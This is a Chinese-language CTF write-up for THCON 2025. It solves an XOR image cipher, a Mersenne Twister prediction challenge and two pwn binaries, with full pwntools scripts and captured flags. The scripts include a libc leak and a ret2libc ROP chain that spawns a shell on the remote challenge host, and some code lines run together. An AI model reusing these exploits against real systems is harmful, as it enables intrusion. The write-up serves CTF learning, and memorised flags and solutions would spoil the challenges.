THCON 2025

Crypto

OTPas_ouf

用10個字符異或加密的jpg圖片，通過頭得到key再恢復原圖

Mammoth's Personnal Slot Machine

梅森旋轉恢復

from pwn import *
from randcrack import RandCrack
from tqdm import trange
context.log_level = 'error'p = remote('74.234.198.209', 33004)rc = RandCrack()
for i in trange(624):p.sendlineafter(b":\n", b'0')p.recvuntil(b"The number was ")v = int(p.recvuntil(b'. ', drop=True))rc.submit(v)context.log_level = 'debug'
v = rc.predict_getrandbits(32)
p.sendlineafter(b":\n", str(v).encode())
print(p.recvline())
print(p.recvline())p.interactive()#THC{1ts_H4rD_T0_H4v3_Tru3_RNG}

PWN

XSStorage 1/3 2/3

前兩關其實沒有難，就是讀代碼找到打包輸入的格式。后邊走到相應的路由就能拿到flag

第3步3/3是0解，沒找到溢出或者漏洞。

from pwn import *
context(arch='amd64', log_level='debug')#p = process('./xsstorage')
#gdb.attach(p, "b*0x5555555557c8\nc")
p = remote('74.234.198.209', 33553)p.send(b'\0\0')
name = b'butch3r'p.send(b'\x01'+bytes([len(name)])+name)
p.send(b'a'*16)
#THC{4u7h_by_0ne-b2294d90}#readdir
p.send(b'\0\x04')
#2 readfile
p.send(b'\0\x02'+p16(0x50)+ p8(18)+b'flag-80dd993f.txt\0')
#THC{l34ky_l34ky_ch3cksum-89723c2a}p.interactive()

BlackMarket 1/2 2/2

在執行buy_exploit(v3)時批針可以前溢出，向前-21處是got表，先泄露地址再通過棧溢出得到shell.

int __cdecl main(int argc, const char **argv, const char **envp)
{int v3; // eaxbanner();printf("Hello person, please enter a temporary username used for your connection: ");fgets(logged_user, 256, stdin);printf("Now, enter your email so we can contact you later: ");fgets(byte_4041C0, 256, stdin);byte_4042C8 = 1;dov3 = menu();while ( (unsigned __int8)buy_exploit(v3) != 1 );return 0;
}

from pwn import *
context(arch='amd64', log_level='debug')libc = ELF('./libc.so.6')#p = process('./black-market')
#gdb.attach(p, "b*0x401542\nc")
p = remote('74.234.198.209', 32844)p.sendlineafter(b"Hello person, please enter a temporary username used for your connection: ", b'A'*0x10+flat(0x404020,0x404028))
p.sendlineafter(b"Now, enter your email so we can contact you later: ", b'A')p.sendlineafter(b'> ', b'-21')
p.recvuntil(b"Exploit \"")
libc.address = u64(p.recv(6)+b'\0\0') - libc.sym['puts']
print(f"{libc.address = :x}")pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
pay = b'\0'*0xd8 + flat(pop_rdi+1, pop_rdi, next(libc.search(b'/bin/sh\0')) ,libc.sym['system'])
p.sendlineafter(b"Let us know your PGP public key to send you the exploit securely:", pay)
p.interactive()#THC{unb0und3d_3xpl0175-186f1dac}
#cd /;read_flag  #THC{r3t2l1bc_101-a03670f2}

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/bicheng/77042.shtml
繁體地址，請注明出處：http://hk.pswp.cn/bicheng/77042.shtml
英文地址，請注明出處：http://en.pswp.cn/bicheng/77042.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！